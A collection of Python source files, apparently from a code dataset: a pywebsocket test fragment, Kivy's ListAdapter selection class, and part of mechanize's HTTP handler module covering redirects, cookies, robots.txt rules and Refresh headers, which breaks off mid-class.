def test_get_memorized_lines_limit_memorized_lines(self):
memorizing_file = memorizingfile.MemorizingFile(StringIO.StringIO(
'Hello\nWorld\nWelcome'), 2)
self.check(memorizing_file, 3, ['Hello\n', 'World\n'])
def test_get_memorized_lines_empty_file(self):
memorizing_file = memorizingfile.MemorizingFile(StringIO.StringIO(
''))
self.check(memorizing_file, 10, [])
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main()
# vi:sts=4 sw=4 et
| EpicCM/SPH-D700-Kernel | external/webkit/WebKitTools/pywebsocket/test/test_memorizingfile.py | Python | gpl-2.0 | 2,887 |
'''
ListAdapter
=================
.. versionadded:: 1.5
.. warning::
This code is still experimental, and its API is subject to change in a
future version.
A :class:`ListAdapter` is an adapter around a python list.
Selection operations are a main concern for the class.
From an :class:`Adapter`, a :class:`ListAdapter` gets cls, template, and
args_converter properties and adds others that control selection behaviour:
* *selection*, a list of selected items.
* *selection_mode*, 'single', 'multiple', 'none'
* *allow_empty_selection*, a boolean -- If False, a selection is forced. If
True, and only user or programmatic action will change selection, it can
be empty.
If you wish to have a bare-bones list adapter, without selection, use a
:class:`~kivy.adapters.simplelistadapter.SimpleListAdapter`.
A :class:`~kivy.adapters.dictadapter.DictAdapter` is a subclass of a
:class:`~kivy.adapters.listadapter.ListAdapter`. They both dispatch the
*on_selection_change* event.
:Events:
`on_selection_change`: (view, view list )
Fired when selection changes
.. versionchanged:: 1.6.0
    Added data = ListProperty([]), which was probably inadvertently deleted at
some point. This means that whenever data changes an update will fire,
instead of having to reset the data object (Adapter has data defined as
an ObjectProperty, so we need to reset it here to ListProperty). See also
DictAdapter and its set of data = DictProperty().
'''
__all__ = ('ListAdapter', )
import inspect
from kivy.event import EventDispatcher
from kivy.adapters.adapter import Adapter
from kivy.adapters.models import SelectableDataItem
from kivy.properties import ListProperty
from kivy.properties import DictProperty
from kivy.properties import BooleanProperty
from kivy.properties import OptionProperty
from kivy.properties import NumericProperty
from kivy.lang import Builder
class ListAdapter(Adapter, EventDispatcher):
    '''
    A base class for adapters interfacing with lists, dictionaries or other
    collection type data, adding selection, view creation and management
    functionality.
    '''

    data = ListProperty([])
    '''The data list property is redefined here, overriding its definition as
    an ObjectProperty in the Adapter class. We bind to data so that any
    changes will trigger updates. See also how the
    :class:`~kivy.adapters.DictAdapter` redefines data as a
    :class:`~kivy.properties.DictProperty`.

    :attr:`data` is a :class:`~kivy.properties.ListProperty` and defaults
    to [].
    '''

    selection = ListProperty([])
    '''The selection list property is the container for selected items.

    :attr:`selection` is a :class:`~kivy.properties.ListProperty` and defaults
    to [].
    '''

    selection_mode = OptionProperty('single',
                                    options=('none', 'single', 'multiple'))
    '''Selection modes:

    * *none*, use the list as a simple list (no select action). This option
      is here so that selection can be turned off, momentarily or
      permanently, for an existing list adapter.
      A :class:`~kivy.adapters.listadapter.ListAdapter` is not meant to be
      used as a primary no-selection list adapter.  Use a
      :class:`~kivy.adapters.simplelistadapter.SimpleListAdapter` for that.

    * *single*, multi-touch/click ignored. Single item selection only.

    * *multiple*, multi-touch / incremental addition to selection allowed;
      may be limited to a count by selection_limit

    :attr:`selection_mode` is an :class:`~kivy.properties.OptionProperty` and
    defaults to 'single'.
    '''

    propagate_selection_to_data = BooleanProperty(False)
    '''Normally, data items are not selected/deselected because the data items
    might not have an is_selected boolean property -- only the item view for a
    given data item is selected/deselected as part of the maintained selection
    list. However, if the data items do have an is_selected property, or if
    they mix in :class:`~kivy.adapters.models.SelectableDataItem`, the
    selection machinery can propagate selection to data items. This can be
    useful for storing selection state in a local database or backend database
    for maintaining state in game play or other similar scenarios. It is a
    convenience function.

    To propagate selection or not?

    Consider a shopping list application for shopping for fruits at the
    market. The app allows for the selection of fruits to buy for each day of
    the week, presenting seven lists: one for each day of the week. Each list is
    loaded with all the available fruits, but the selection for each is a
    subset. There is only one set of fruit data shared between the lists, so
    it would not make sense to propagate selection to the data because
    selection in any of the seven lists would clash and mix with that of the
    others.

    However, consider a game that uses the same fruits data for selecting
    fruits available for fruit-tossing. A given round of play could have a
    full fruits list, with fruits available for tossing shown selected. If the
    game is saved and rerun, the full fruits list, with selection marked on
    each item, would be reloaded correctly if selection is always propagated to
    the data. You could accomplish the same functionality by writing code to
    operate on list selection, but having selection stored in the data
    ListProperty might prove convenient in some cases.

    :attr:`propagate_selection_to_data` is a
    :class:`~kivy.properties.BooleanProperty` and defaults to False.
    '''

    allow_empty_selection = BooleanProperty(True)
    '''The allow_empty_selection may be used for cascading selection between
    several list views, or between a list view and an observing view. Such
    automatic maintenance of the selection is important for all but simple
    list displays. Set allow_empty_selection to False and the selection is
    auto-initialized and always maintained, so any observing views
    may likewise be updated to stay in sync.

    :attr:`allow_empty_selection` is a
    :class:`~kivy.properties.BooleanProperty` and defaults to True.
    '''

    selection_limit = NumericProperty(-1)
    '''When the selection_mode is multiple and the selection_limit is
    non-negative, this number will limit the number of selected items. It can
    be set to 1, which is equivalent to single selection. If selection_limit is
    not set, the default value is -1, meaning that no limit will be enforced.

    :attr:`selection_limit` is a :class:`~kivy.properties.NumericProperty` and
    defaults to -1 (no limit).
    '''

    cached_views = DictProperty({})
    '''View instances for data items are instantiated and managed by the
    adapter. Here we maintain a dictionary containing the view
    instances keyed to the indices in the data.

    This dictionary works as a cache. get_view() only asks for a view from
    the adapter if one is not already stored for the requested index.

    :attr:`cached_views` is a :class:`~kivy.properties.DictProperty` and
    defaults to {}.
    '''

    __events__ = ('on_selection_change', )

    def __init__(self, **kwargs):
        super(ListAdapter, self).__init__(**kwargs)

        # Keep the view cache and the selection in sync with changes to
        # the data and to the selection-related configuration.
        self.bind(selection_mode=self.selection_mode_changed,
                  allow_empty_selection=self.check_for_empty_selection,
                  data=self.update_for_new_data)

        self.update_for_new_data()

    def delete_cache(self, *args):
        '''Drop all cached item views; they will be recreated on demand.'''
        self.cached_views = {}

    def get_count(self):
        '''Return the number of data items.'''
        return len(self.data)

    def get_data_item(self, index):
        '''Return the data item at index, or None if index is out of
        range.'''
        if index < 0 or index >= len(self.data):
            return None
        return self.data[index]

    def selection_mode_changed(self, *args):
        # Switching to 'none' clears any existing selection; any other
        # mode may need to force a selection (allow_empty_selection).
        if self.selection_mode == 'none':
            for selected_view in self.selection:
                self.deselect_item_view(selected_view)
        else:
            self.check_for_empty_selection()

    def get_view(self, index):
        '''Return the (possibly cached) item view for index, or None if
        there is no data item at that index.'''
        if index in self.cached_views:
            return self.cached_views[index]
        item_view = self.create_view(index)
        if item_view:
            self.cached_views[index] = item_view
        return item_view

    def create_view(self, index):
        '''This method is more complicated than the one in
        :class:`kivy.adapters.adapter.Adapter` and
        :class:`kivy.adapters.simplelistadapter.SimpleListAdapter`, because
        here we create bindings for the data item and its children back to
        self.handle_selection(), and do other selection-related tasks to keep
        item views in sync with the data.
        '''
        item = self.get_data_item(index)
        if item is None:
            return None

        item_args = self.args_converter(index, item)

        item_args['index'] = index

        if self.cls:
            view_instance = self.cls(**item_args)
        else:
            view_instance = Builder.template(self.template, **item_args)

        if self.propagate_selection_to_data:
            # The data item must be a subclass of SelectableDataItem, or must
            # have an is_selected boolean or function, so it has is_selected
            # available. If is_selected is unavailable on the data item, an
            # exception is raised.
            #
            if isinstance(item, SelectableDataItem):
                if item.is_selected:
                    self.handle_selection(view_instance)
            elif type(item) == dict and 'is_selected' in item:
                if item['is_selected']:
                    self.handle_selection(view_instance)
            elif hasattr(item, 'is_selected'):
                if (inspect.isfunction(item.is_selected)
                        or inspect.ismethod(item.is_selected)):
                    if item.is_selected():
                        self.handle_selection(view_instance)
                else:
                    if item.is_selected:
                        self.handle_selection(view_instance)
            else:
                msg = "ListAdapter: unselectable data item for {0}"
                raise Exception(msg.format(index))

        view_instance.bind(on_release=self.handle_selection)

        for child in view_instance.children:
            child.bind(on_release=self.handle_selection)

        return view_instance

    def on_selection_change(self, *args):
        '''on_selection_change() is the default handler for the
        on_selection_change event.
        '''
        pass

    def handle_selection(self, view, hold_dispatch=False, *args):
        '''Select or deselect view, enforcing selection_mode and
        selection_limit, then dispatch on_selection_change (unless
        hold_dispatch is True, used for batching).'''
        if view not in self.selection:
            if self.selection_mode in ['none', 'single'] and \
                    len(self.selection) > 0:
                for selected_view in self.selection:
                    self.deselect_item_view(selected_view)
            if self.selection_mode != 'none':
                if self.selection_mode == 'multiple':
                    if self.allow_empty_selection:
                        # If < 0, selection_limit is not active.
                        if self.selection_limit < 0:
                            self.select_item_view(view)
                        else:
                            if len(self.selection) < self.selection_limit:
                                self.select_item_view(view)
                    else:
                        self.select_item_view(view)
                else:
                    self.select_item_view(view)
        else:
            self.deselect_item_view(view)
            if self.selection_mode != 'none':
                # If the deselection makes selection empty, the following call
                # will check allows_empty_selection, and if False, will
                # select the first item. If view happens to be the first item,
                # this will be a reselection, and the user will notice no
                # change, except perhaps a flicker.
                #
                self.check_for_empty_selection()

        if not hold_dispatch:
            self.dispatch('on_selection_change')

    def select_data_item(self, item):
        self.set_data_item_selection(item, True)

    def deselect_data_item(self, item):
        self.set_data_item_selection(item, False)

    def set_data_item_selection(self, item, value):
        '''Write the selection state value onto the data item, for data
        items that carry selection state (see
        propagate_selection_to_data).'''
        if isinstance(item, SelectableDataItem):
            item.is_selected = value
        elif type(item) == dict:
            item['is_selected'] = value
        elif hasattr(item, 'is_selected'):
            if (inspect.isfunction(item.is_selected)
                    or inspect.ismethod(item.is_selected)):
                # NOTE(review): this calls is_selected() and discards both
                # the result and value, so selection state is never actually
                # written when is_selected is callable. This looks like a
                # pre-existing bug -- confirm the intended is_selected()
                # signature before changing it.
                item.is_selected()
            else:
                item.is_selected = value

    def select_item_view(self, view):
        view.select()
        view.is_selected = True
        self.selection.append(view)

        # [TODO] sibling selection for composite items
        #        Needed? Or handled from parent?
        #        (avoid circular, redundant selection)
        #if hasattr(view, 'parent') and hasattr(view.parent, 'children'):
         #siblings = [child for child in view.parent.children if child != view]
         #for sibling in siblings:
             #if hasattr(sibling, 'select'):
                 #sibling.select()

        if self.propagate_selection_to_data:
            data_item = self.get_data_item(view.index)
            self.select_data_item(data_item)

    def select_list(self, view_list, extend=True):
        '''The select call is made for the items in the provided view_list.

        Arguments:

            view_list: the list of item views to become the new selection, or
            to add to the existing selection

            extend: boolean for whether or not to extend the existing list
        '''
        if not extend:
            self.selection = []

        for view in view_list:
            self.handle_selection(view, hold_dispatch=True)

        self.dispatch('on_selection_change')

    def deselect_item_view(self, view):
        view.deselect()
        view.is_selected = False
        self.selection.remove(view)

        # [TODO] sibling deselection for composite items
        #        Needed? Or handled from parent?
        #        (avoid circular, redundant selection)
        #if hasattr(view, 'parent') and hasattr(view.parent, 'children'):
         #siblings = [child for child in view.parent.children if child != view]
         #for sibling in siblings:
             #if hasattr(sibling, 'deselect'):
                 #sibling.deselect()

        if self.propagate_selection_to_data:
            item = self.get_data_item(view.index)
            self.deselect_data_item(item)

    def deselect_list(self, l):
        '''Toggle selection handling for each view in l, dispatching a
        single on_selection_change at the end.'''
        for view in l:
            self.handle_selection(view, hold_dispatch=True)

        self.dispatch('on_selection_change')

    # [TODO] Could easily add select_all() and deselect_all().

    def update_for_new_data(self, *args):
        self.delete_cache()
        self.initialize_selection()

    def initialize_selection(self, *args):
        '''Reset the selection and re-apply the empty-selection policy.'''
        if len(self.selection) > 0:
            self.selection = []
            self.dispatch('on_selection_change')

        self.check_for_empty_selection()

    def check_for_empty_selection(self, *args):
        if not self.allow_empty_selection:
            if len(self.selection) == 0:
                # Select the first item if we have it.
                v = self.get_view(0)
                if v is not None:
                    self.handle_selection(v)

    # [TODO] Also make methods for scroll_to_sel_start, scroll_to_sel_end,
    #        scroll_to_sel_middle.

    def trim_left_of_sel(self, *args):
        '''Cut data items with indices that are less than the index of the
        first selected item if there is a selection.
        '''
        if len(self.selection) > 0:
            first_sel_index = min([sel.index for sel in self.selection])
            self.data = self.data[first_sel_index:]

    def trim_right_of_sel(self, *args):
        '''Cut data items with indices that are greater than the index of
        the last selected item if there is a selection.
        '''
        if len(self.selection) > 0:
            last_sel_index = max([sel.index for sel in self.selection])
            self.data = self.data[:last_sel_index + 1]

    def trim_to_sel(self, *args):
        '''Cut data items with indices that are less than or greater than
        the indices of the first and last selected items if there is a
        selection. This preserves intervening list items within the selected
        range.
        '''
        if len(self.selection) > 0:
            sel_indices = [sel.index for sel in self.selection]
            first_sel_index = min(sel_indices)
            last_sel_index = max(sel_indices)
            self.data = self.data[first_sel_index:last_sel_index + 1]

    def cut_to_sel(self, *args):
        '''Same as trim_to_sel, but intervening list items within the selected
        range are also cut, leaving only list items that are selected.
        '''
        if len(self.selection) > 0:
            self.data = self.selection
| JulienMcJay/eclock | windows/kivy/kivy/adapters/listadapter.py | Python | gpl-2.0 | 17,276 |
"""HTTP related handlers.
Note that some other HTTP handlers live in more specific modules: _auth.py,
_gzip.py, etc.
Copyright 2002-2006 John J Lee <jjl@pobox.com>
This code is free software; you can redistribute it and/or modify it
under the terms of the BSD or ZPL 2.1 licenses (see the file
COPYING.txt included with the distribution).
"""
import time, htmlentitydefs, logging, \
fakesocket, urllib2, urllib, httplib, sgmllib
from urllib2 import URLError, HTTPError, BaseHandler
from cStringIO import StringIO
from _clientcookie import CookieJar
from _headersutil import is_html
from _html import unescape, unescape_charref
from _request import Request
from _response import closeable_response, response_seek_wrapper
import _rfc3986
import _sockettimeout
debug = logging.getLogger("mechanize").debug
debug_robots = logging.getLogger("mechanize.robots").debug
# monkeypatch urllib2.HTTPError to show URL
## def urllib2_str(self):
## return 'HTTP Error %s: %s (%s)' % (
## self.code, self.msg, self.geturl())
## urllib2.HTTPError.__str__ = urllib2_str
CHUNK = 1024 # size of chunks fed to HTML HEAD parser, in bytes
DEFAULT_ENCODING = 'latin-1'
#try:
# socket._fileobject("fake socket", close=True)
#except TypeError:
# python <= 2.4
# create_readline_wrapper = socket._fileobject
#else:
def create_readline_wrapper(fh):
    # Wrap fh in a file-like object providing buffered readline();
    # close=True makes closing the wrapper also close fh.
    # fakesocket._fileobject presumably mirrors the stdlib
    # socket._fileobject API (see the commented-out compatibility code
    # above) -- confirm against the fakesocket module.
    return fakesocket._fileobject(fh, close=True)
# This adds "refresh" to the list of redirectables and provides a redirection
# algorithm that doesn't go into a loop in the presence of cookies
# (Python 2.4 has this new algorithm, 2.3 doesn't).
class HTTPRedirectHandler(BaseHandler):
    """Handle 30x redirections and "refresh" pseudo-redirections.

    Adds "refresh" to the set of redirectable codes and uses a
    loop-detection algorithm that tolerates revisiting the same URL a
    limited number of times (state introduced by cookies means a repeat
    visit is not necessarily a loop).
    """
    # maximum number of redirections to any single URL
    # this is needed because of the state that cookies introduce
    max_repeats = 4
    # maximum total number of redirections (regardless of URL) before
    # assuming we're in a loop
    max_redirections = 10

    # Implementation notes:

    # To avoid the server sending us into an infinite loop, the request
    # object needs to track what URLs we have already seen.  Do this by
    # adding a handler-specific attribute to the Request object.  The value
    # of the dict is used to count the number of times the same URL has
    # been visited.  This is needed because visiting the same URL twice
    # does not necessarily imply a loop, thanks to state introduced by
    # cookies.

    # Always unhandled redirection codes:
    # 300 Multiple Choices: should not handle this here.
    # 304 Not Modified: no need to handle here: only of interest to caches
    #     that do conditional GETs
    # 305 Use Proxy: probably not worth dealing with here
    # 306 Unused: what was this for in the previous versions of protocol??

    def redirect_request(self, newurl, req, fp, code, msg, headers):
        """Return a Request or None in response to a redirect.

        This is called by the http_error_30x methods when a redirection
        response is received.  If a redirection should take place, return a
        new Request to allow http_error_30x to perform the redirect;
        otherwise, return None to indicate that an HTTPError should be
        raised.
        """
        if code in (301, 302, 303, "refresh") or \
               (code == 307 and not req.has_data()):
            # Strictly (according to RFC 2616), 301 or 302 in response to
            # a POST MUST NOT cause a redirection without confirmation
            # from the user (of urllib2, in this case).  In practice,
            # essentially all clients do redirect in this case, so we do
            # the same.
            # XXX really refresh redirections should be visiting; tricky to
            #  fix, so this will wait until post-stable release
            new = Request(newurl,
                          headers=req.headers,
                          origin_req_host=req.get_origin_req_host(),
                          unverifiable=True,
                          visit=False,
                          )
            # Remember the request that started the chain, so other
            # handlers (e.g. robots.txt handling) can identify it.
            new._origin_req = getattr(req, "_origin_req", req)
            return new
        else:
            raise HTTPError(req.get_full_url(), code, msg, headers, fp)

    def http_error_302(self, req, fp, code, msg, headers):
        """Follow a redirect response (shared by 301/302/303/307/refresh)."""
        # Some servers (incorrectly) return multiple Location headers
        # (so probably same goes for URI).  Use first header.
        if headers.has_key('location'):
            newurl = headers.getheaders('location')[0]
        elif headers.has_key('uri'):
            newurl = headers.getheaders('uri')[0]
        else:
            # No redirect target given; nothing for this handler to do.
            return
        newurl = _rfc3986.clean_url(newurl, "latin-1")
        newurl = _rfc3986.urljoin(req.get_full_url(), newurl)

        # XXX Probably want to forget about the state of the current
        # request, although that might interact poorly with other
        # handlers that also use handler-specific request attributes
        new = self.redirect_request(newurl, req, fp, code, msg, headers)
        if new is None:
            return

        # loop detection
        # .redirect_dict has a key url if url was previously visited.
        if hasattr(req, 'redirect_dict'):
            visited = new.redirect_dict = req.redirect_dict
            if (visited.get(newurl, 0) >= self.max_repeats or
                len(visited) >= self.max_redirections):
                raise HTTPError(req.get_full_url(), code,
                                self.inf_msg + msg, headers, fp)
        else:
            visited = new.redirect_dict = req.redirect_dict = {}
        visited[newurl] = visited.get(newurl, 0) + 1

        # Don't close the fp until we are sure that we won't use it
        # with HTTPError.
        fp.read()
        fp.close()

        return self.parent.open(new)

    http_error_301 = http_error_303 = http_error_307 = http_error_302
    http_error_refresh = http_error_302

    inf_msg = "The HTTP server returned a redirect error that would " \
              "lead to an infinite loop.\n" \
              "The last 30x error message was:\n"
# XXX would self.reset() work, instead of raising this exception?
class EndOfHeadError(Exception):
    """Raised by the HEAD parsers to stop parsing at the end of HEAD."""
class AbstractHeadParser:
    """Shared logic for parsing the HEAD of an HTML document.

    Collects (http-equiv, content) pairs from <meta> elements into the
    http_equiv list and raises EndOfHeadError when the end of HEAD is
    reached.  Concrete subclasses supply the underlying parser machinery
    (sgmllib- or HTMLParser-based).
    """
    # only these elements are allowed in or before HEAD of document
    head_elems = ("html", "head",
                  "title", "base",
                  "script", "style", "meta", "link", "object")
    _entitydefs = htmlentitydefs.name2codepoint
    _encoding = DEFAULT_ENCODING

    def __init__(self):
        # Accumulated (http-equiv, content) pairs, in document order.
        self.http_equiv = []

    def start_meta(self, attrs):
        # Record the http-equiv/content pair if both attributes are present.
        http_equiv = content = None
        for key, value in attrs:
            if key == "http-equiv":
                http_equiv = self.unescape_attr_if_required(value)
            elif key == "content":
                content = self.unescape_attr_if_required(value)
        if http_equiv is not None and content is not None:
            self.http_equiv.append((http_equiv, content))

    def end_head(self):
        # </head> seen: signal the driver (parse_head) to stop feeding data.
        raise EndOfHeadError()

    def handle_entityref(self, name):
        #debug("%s", name)
        self.handle_data(unescape(
            '&%s;' % name, self._entitydefs, self._encoding))

    def handle_charref(self, name):
        #debug("%s", name)
        self.handle_data(unescape_charref(name, self._encoding))

    def unescape_attr(self, name):
        #debug("%s", name)
        return unescape(name, self._entitydefs, self._encoding)

    def unescape_attrs(self, attrs):
        #debug("%s", attrs)
        escaped_attrs = {}
        for key, val in attrs.items():
            escaped_attrs[key] = self.unescape_attr(val)
        return escaped_attrs

    def unknown_entityref(self, ref):
        # Pass unrecognised entity references through unchanged.
        self.handle_data("&%s;" % ref)

    def unknown_charref(self, ref):
        # Pass unrecognised character references through unchanged.
        self.handle_data("&#%s;" % ref)
# XHTMLCompatibleHeadParser is only defined when the HTMLParser module is
# importable; callers must cope with its absence.
try:
    import HTMLParser
except ImportError:
    pass
else:
    class XHTMLCompatibleHeadParser(AbstractHeadParser,
                                    HTMLParser.HTMLParser):
        """HEAD parser built on HTMLParser (more tolerant of XHTML than
        the sgmllib-based HeadParser)."""
        def __init__(self):
            HTMLParser.HTMLParser.__init__(self)
            AbstractHeadParser.__init__(self)

        def handle_starttag(self, tag, attrs):
            # Any tag not permitted in HEAD means HEAD is over.
            if tag not in self.head_elems:
                raise EndOfHeadError()
            try:
                method = getattr(self, 'start_' + tag)
            except AttributeError:
                try:
                    method = getattr(self, 'do_' + tag)
                except AttributeError:
                    pass # unknown tag
                else:
                    method(attrs)
            else:
                method(attrs)

        def handle_endtag(self, tag):
            if tag not in self.head_elems:
                raise EndOfHeadError()
            try:
                method = getattr(self, 'end_' + tag)
            except AttributeError:
                pass # unknown tag
            else:
                method()

        def unescape(self, name):
            # Use the entitydefs passed into constructor, not
            # HTMLParser.HTMLParser's entitydefs.
            return self.unescape_attr(name)

        def unescape_attr_if_required(self, name):
            return name # HTMLParser.HTMLParser already did it
class HeadParser(AbstractHeadParser, sgmllib.SGMLParser):
    """HEAD parser built on sgmllib.SGMLParser (the default)."""

    def _not_called(self):
        # Placeholder passed as the method argument to handle_starttag for
        # unknown tags; handle_starttag only invokes the method for <meta>,
        # so this must never actually run.
        assert False

    def __init__(self):
        sgmllib.SGMLParser.__init__(self)
        AbstractHeadParser.__init__(self)

    def handle_starttag(self, tag, method, attrs):
        # Any tag not permitted in HEAD means HEAD is over.
        if tag not in self.head_elems:
            raise EndOfHeadError()
        if tag == "meta":
            method(attrs)

    def unknown_starttag(self, tag, attrs):
        self.handle_starttag(tag, self._not_called, attrs)

    def handle_endtag(self, tag, method):
        if tag in self.head_elems:
            method()
        else:
            raise EndOfHeadError()

    def unescape_attr_if_required(self, name):
        # SGMLParser does not unescape attribute values itself.
        return self.unescape_attr(name)
def parse_head(fileobj, parser):
    """Feed fileobj to parser in CHUNK-sized pieces and return the
    collected list of (http-equiv, content) key-value pairs.

    Feeding stops when the parser raises EndOfHeadError (end of the HTML
    HEAD) or when a short read indicates there is no more data.
    """
    while True:
        chunk = fileobj.read(CHUNK)
        try:
            parser.feed(chunk)
        except EndOfHeadError:
            break
        if len(chunk) != CHUNK:
            # this should only happen if there is no HTML body, or if
            # CHUNK is big
            break
    return parser.http_equiv
class HTTPEquivProcessor(BaseHandler):
    """Append META HTTP-EQUIV headers to regular HTTP headers."""

    handler_order = 300  # before handlers that look at HTTP headers

    def __init__(self, head_parser_class=HeadParser,
                 i_want_broken_xhtml_support=False,
                 ):
        self.head_parser_class = head_parser_class
        self._allow_xhtml = i_want_broken_xhtml_support

    def http_response(self, request, response):
        # Parse the HEAD of HTML responses and merge any http-equiv
        # pseudo-headers into the real HTTP message headers.
        if not hasattr(response, "seek"):
            response = response_seek_wrapper(response)
        http_message = response.info()
        url = response.geturl()
        ct_hdrs = http_message.getheaders("content-type")
        if is_html(ct_hdrs, url, self._allow_xhtml):
            try:
                try:
                    html_headers = parse_head(response,
                                              self.head_parser_class())
                finally:
                    # Always rewind so downstream consumers see the
                    # response from the start.
                    response.seek(0)
            except (HTMLParser.HTMLParseError,
                    sgmllib.SGMLParseError):
                # NOTE(review): if the HTMLParser import above failed,
                # the name HTMLParser is undefined here and this clause
                # would raise NameError instead of catching the parse
                # error.  Pre-existing behaviour; confirm before changing.
                pass
            else:
                for hdr, val in html_headers:
                    # add a header
                    http_message.dict[hdr.lower()] = val
                    text = hdr + ": " + val
                    for line in text.split("\n"):
                        http_message.headers.append(line + "\n")
        return response

    https_response = http_response
class HTTPCookieProcessor(BaseHandler):
    """Handle HTTP cookies.

    Cookies from responses are stored in the jar and added back onto
    later requests.

    Public attributes:

    cookiejar: CookieJar instance
    """
    def __init__(self, cookiejar=None):
        # Fall back to a fresh, empty jar when none is supplied.
        self.cookiejar = CookieJar() if cookiejar is None else cookiejar

    def http_request(self, request):
        # Attach any matching stored cookies to the outgoing request.
        self.cookiejar.add_cookie_header(request)
        return request

    def http_response(self, request, response):
        # Store any cookies the server set on this response.
        self.cookiejar.extract_cookies(response, request)
        return response

    https_request = http_request
    https_response = http_response
# MechanizeRobotFileParser is only defined when the robotparser module is
# importable.
try:
    import robotparser
except ImportError:
    pass
else:
    class MechanizeRobotFileParser(robotparser.RobotFileParser):
        """RobotFileParser that fetches robots.txt through a mechanize
        opener (so handlers and timeouts apply) instead of urllib."""

        def __init__(self, url='', opener=None):
            robotparser.RobotFileParser.__init__(self, url)
            self._opener = opener
            self._timeout = _sockettimeout._GLOBAL_DEFAULT_TIMEOUT

        def set_opener(self, opener=None):
            import _opener
            if opener is None:
                opener = _opener.OpenerDirector()
            self._opener = opener

        def set_timeout(self, timeout):
            self._timeout = timeout

        def read(self):
            """Reads the robots.txt URL and feeds it to the parser."""
            if self._opener is None:
                self.set_opener()
            req = Request(self.url, unverifiable=True, visit=False,
                          timeout=self._timeout)
            try:
                f = self._opener.open(req)
            except HTTPError, f:
                # An HTTPError is itself a file-like response object;
                # binding it to f lets the status handling below proceed.
                pass
            #except (IOError, socket.error, OSError), exc:
            except (IOError, OSError), exc:
                debug_robots("ignoring error opening %r: %s" %
                             (self.url, exc))
                return
            lines = []
            line = f.readline()
            while line:
                lines.append(line.strip())
                line = f.readline()
            status = f.code
            if status == 401 or status == 403:
                # Access to robots.txt itself denied: be conservative and
                # disallow everything.
                self.disallow_all = True
                debug_robots("disallow all")
            elif status >= 400:
                # Other errors (e.g. 404): assume no restrictions.
                self.allow_all = True
                debug_robots("allow all")
            elif status == 200 and lines:
                debug_robots("parse lines")
                self.parse(lines)
class RobotExclusionError(urllib2.HTTPError):
    """HTTPError raised when robots.txt disallows fetching a URL.

    The offending Request is available as the .request attribute; the
    remaining positional arguments are passed straight through to
    urllib2.HTTPError (url, code, msg, hdrs, fp).
    """
    def __init__(self, request, *args):
        # Direct base-class call instead of the long-deprecated apply()
        # builtin (removed in Python 3); behaviour is identical.
        urllib2.HTTPError.__init__(self, *args)
        self.request = request
class HTTPRobotRulesProcessor(BaseHandler):
    """Refuse to send requests that the target host's robots.txt
    disallows, raising RobotExclusionError for disallowed URLs.

    robots.txt is fetched lazily and cached for one host at a time.
    """
    # before redirections, after everything else
    handler_order = 800

    try:
        from httplib import HTTPMessage
    except:
        from mimetools import Message
        http_response_class = Message
    else:
        http_response_class = HTTPMessage

    def __init__(self, rfp_class=MechanizeRobotFileParser):
        self.rfp_class = rfp_class
        self.rfp = None  # parsed robots.txt for the currently cached host
        self._host = None  # host whose robots.txt is currently cached

    def http_request(self, request):
        scheme = request.get_type()
        if scheme not in ["http", "https"]:
            # robots exclusion only applies to HTTP
            return request

        if request.get_selector() == "/robots.txt":
            # /robots.txt is always OK to fetch
            return request

        host = request.get_host()

        # robots.txt requests don't need to be allowed by robots.txt :-)
        origin_req = getattr(request, "_origin_req", None)
        if (origin_req is not None and
            origin_req.get_selector() == "/robots.txt" and
            origin_req.get_host() == host
            ):
            return request

        if host != self._host:
            # New host: fetch and cache its robots.txt.
            self.rfp = self.rfp_class()
            try:
                self.rfp.set_opener(self.parent)
            except AttributeError:
                debug("%r instance does not support set_opener" %
                      self.rfp.__class__)
            self.rfp.set_url(scheme+"://"+host+"/robots.txt")
            self.rfp.set_timeout(request.timeout)
            self.rfp.read()
            self._host = host

        ua = request.get_header("User-agent", "")
        if self.rfp.can_fetch(ua, request.get_full_url()):
            return request
        else:
            # XXX This should really have raised URLError.  Too late now...
            msg = "request disallowed by robots.txt"
            raise RobotExclusionError(
                request,
                request.get_full_url(),
                403, msg,
                self.http_response_class(StringIO()), StringIO(msg))

    https_request = http_request
class HTTPRefererProcessor(BaseHandler):
    """Add Referer header to requests.

    This only makes sense if you use each RefererProcessor for a single
    chain of requests only (so, for example, if you use a single
    HTTPRefererProcessor to fetch a series of URLs extracted from a single
    page, this will break).

    There's a proper implementation of this in mechanize.Browser.
    """
    def __init__(self):
        # URL of the most recently seen response; None until one arrives.
        self.referer = None

    def http_request(self, request):
        # Only set Referer once we have one, and never clobber a Referer
        # the caller supplied explicitly.
        if self.referer is not None and not request.has_header("Referer"):
            request.add_unredirected_header("Referer", self.referer)
        return request

    def http_response(self, request, response):
        # The URL just fetched becomes the Referer for the next request.
        self.referer = response.geturl()
        return response

    https_request = http_request
    https_response = http_response
def clean_refresh_url(url):
    """Strip matching surrounding quotes from a Refresh-header URL and
    clean it for use in a redirect.

    e.g. Firefox 1.5 emits (something like) quoted URLs here.
    """
    quoted = ((url.startswith('"') and url.endswith('"')) or
              (url.startswith("'") and url.endswith("'")))
    if quoted:
        url = url[1:-1]
    return _rfc3986.clean_url(url, "latin-1")  # XXX encoding
def parse_refresh_header(refresh):
    """Parse a Refresh header value into a (pause, url-or-None) pair.

    >>> parse_refresh_header("1; url=http://example.com/")
    (1.0, 'http://example.com/')
    >>> parse_refresh_header("1; url='http://example.com/'")
    (1.0, 'http://example.com/')
    >>> parse_refresh_header("1")
    (1.0, None)
    >>> parse_refresh_header("blah")
    Traceback (most recent call last):
    ValueError: invalid literal for float(): blah
    """
    pieces = refresh.split(";", 1)
    if len(pieces) == 2:
        # "<pause>; url=<url>" form.
        pause = float(pieces[0])
        kv = pieces[1].split("=", 1)
        if len(kv) == 2:
            key, newurl = kv
            newurl = clean_refresh_url(newurl)
        else:
            key = None
        if key is None or key.strip().lower() != "url":
            raise ValueError()
    else:
        # Bare "<pause>" form: refresh the same page.
        pause, newurl = float(refresh), None
    return pause, newurl
class HTTPRefreshProcessor(BaseHandler):
    """Perform HTTP Refresh redirections.

    Note that if a non-200 HTTP code has occurred (for example, a 30x
    redirect), this processor will do nothing.

    By default, only zero-time Refresh headers are redirected.  Use the
    max_time attribute / constructor argument to allow Refresh with longer
    pauses.  Use the honor_time attribute / constructor argument to control
    whether the requested pause is honoured (with a time.sleep()) or
    skipped in favour of immediate redirection.

    Public attributes:

    max_time: see above
    honor_time: see above

    """
    handler_order = 1000

    def __init__(self, max_time=0, honor_time=True):
        self.max_time = max_time
        self.honor_time = honor_time
        # Indirection over time.sleep; presumably so the pause can be
        # stubbed out (e.g. by tests) -- confirm before relying on it.
